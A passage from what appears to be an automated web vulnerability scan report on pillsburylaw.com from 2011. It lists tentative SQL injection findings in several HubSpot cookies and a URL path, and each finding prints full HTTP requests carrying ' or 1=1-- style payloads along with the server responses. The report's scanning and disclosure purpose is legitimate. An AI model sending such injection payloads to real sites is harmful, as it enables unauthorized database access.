<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...
1.22. http://www.pillsburylaw.com/ [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 78616436'%20or%201%3d1--%20 and 78616436'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee578616436'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:09:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee578616436'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819626;path=/
Set-Cookie: CFTOKEN=40904157;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...
1.23. http://www.pillsburylaw.com/ [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 57053856'%20or%201%3d1--%20 and 57053856'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee557053856'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:10:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee557053856'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819645;path=/
Set-Cookie: CFTOKEN=46650698;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...
1.24. http://www.pillsburylaw.com/ [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 17776757'%20or%201%3d1--%20 and 17776757'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee517776757'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:10:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee517776757'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819684;path=/
Set-Cookie: CFTOKEN=93449910;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...
1.25. http://www.pillsburylaw.com/ [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 16942143'%20or%201%3d1--%20 and 16942143'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee516942143'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:10:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee516942143'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819666;path=/
Set-Cookie: CFTOKEN=29553522;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...
1.26. http://www.pillsburylaw.com/404.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /404.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 57742005'%20or%201%3d1--%20 and 57742005'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /404.htm57742005'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:11:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /404.htm57742005'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
